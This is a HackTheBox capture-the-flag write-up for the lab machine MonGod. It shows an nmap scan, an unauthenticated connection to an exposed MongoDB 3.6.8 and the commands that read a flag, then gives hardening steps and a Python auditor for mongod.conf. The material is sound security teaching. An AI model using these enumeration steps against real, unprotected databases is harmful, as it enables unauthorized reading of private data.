@cywf
Created September 10, 2023 03:41
HackTheBox Write-up: MonGod

Machine Details:

  • Machine Name: MonGod
  • IP Address: 10.129.60.233
  • User: cywf

What I Did:

1. Nmap Scan: I started with a full TCP port scan with version detection to identify the open ports and the services behind them.

$ nmap -p- -T4 -sV 10.129.60.233

Results:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-10 04:10 BST
Nmap scan report for 10.129.60.233
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open  mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.42 seconds

2. MongoDB Exploration: After identifying that MongoDB was running on port 27017, I proceeded to connect to it.

First, I downloaded the MongoDB 3.4.7 server tarball, which bundles the legacy mongo shell, and unpacked it:

curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
tar xvf mongodb-linux-x86_64-3.4.7.tgz

Then I connected to the target with the mongo shell from the unpacked bin/ directory, supplying no credentials at all (the 3.4 shell is older than the 3.6.8 server, so it prints a shell/server version mismatch warning, but the connection succeeds):

cd mongodb-linux-x86_64-3.4.7/bin
./mongo mongodb://10.129.60.233:27017

Upon connection, I listed the databases and inspected the sensitive_information database:

> show dbs
> use sensitive_information;
> show collections;
> db.flag.find().pretty();

Vulnerability:

The MongoDB 3.6.8 instance on the target was reachable over the network with access control disabled: it accepted connections and commands without any authentication, so any client that could reach TCP/27017 could enumerate every database and read every collection. That is how I was able to list the databases and read the flag document out of sensitive_information.

How to Patch:

  1. Enable Authentication: Create an administrative user first (MongoDB's localhost exception allows this on a fresh instance), then set security.authorization: enabled in mongod.conf or start mongod with the --auth flag, restart, and confirm that an unauthenticated show dbs is now refused.
  2. Bind to localhost: If the instance is not meant to be reached externally, set net.bindIp: 127.0.0.1 (or --bind_ip 127.0.0.1). MongoDB 3.6 already defaults to localhost, so an instance that answers on the network, as this one did, has been explicitly bound to 0.0.0.0 or another external address.
  3. Firewall Rules: Restrict access to the MongoDB port (27017 by default) to the specific hosts that need it, as a second layer in case the bind address or authentication settings regress.
  4. Regularly Update: Keep MongoDB on a supported release; the 3.6 series is end-of-life and no longer receives security fixes.
  5. Monitor Logs: Review the mongod log for connections from unexpected source addresses and, once authentication is on, for repeated authentication failures, which are the signature of exactly this kind of probing.
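To make items 1 and 2 checkable rather than aspirational, here is an added example (my own, not from the write-up or from MongoDB) that audits a mongod.conf for the two settings behind this finding. Both configuration fragments are constructed: the first reproduces the state the scan implies (no security section, bound to 0.0.0.0), the second is the corrected form. The parser handles only the simple indentation-nested key: value layout that mongod.conf uses, not general YAML.

```python
# Two constructed mongod.conf fragments: the state behind the finding and the fixed one.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0          # reachable from every interface
# no security section: authorization is disabled by default
"""

HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1        # or a comma-separated list of trusted addresses
security:
  authorization: enabled   # an admin user must exist before this is turned on
"""

def parse_simple_yaml(text):
    """Parse indentation-nested `key: value` lines (the mongod.conf layout) into dicts.

    Comments are stripped; lists, quoting and multi-line values are out of scope.
    """
    root, stack = {}, []                   # stack of (indent, mapping) for open sections
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:   # dedent closes inner sections
            stack.pop()
        parent = stack[-1][1] if stack else root
        if value.strip():
            parent[key] = value.strip()
        else:                              # a key with no value opens a nested section
            parent[key] = {}
            stack.append((indent, parent[key]))
    return root

def audit_mongod_conf(text):
    """Return findings for the two settings that made the box trivially readable."""
    conf = parse_simple_yaml(text)
    findings = []
    if conf.get("security", {}).get("authorization") != "enabled":
        findings.append("security.authorization is not 'enabled': unauthenticated clients can run commands")
    net = conf.get("net", {})
    # mongod 3.6+ binds to localhost when bindIp is absent, so that is the safe default here
    bind_ips = [ip.strip() for ip in net.get("bindIp", "127.0.0.1").split(",")]
    if net.get("bindIpAll") == "true" or any(ip in ("0.0.0.0", "::") for ip in bind_ips):
        findings.append(f"net.bindIp={net.get('bindIp', '')!r}: mongod listens on all interfaces")
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(conf) or ["no findings"])
```

Run it against /etc/mongod.conf on the server after the change; an empty findings list means both the authorization and bind-address settings are in the state items 1 and 2 call for, while the firewall rule from item 3 still has to be verified separately.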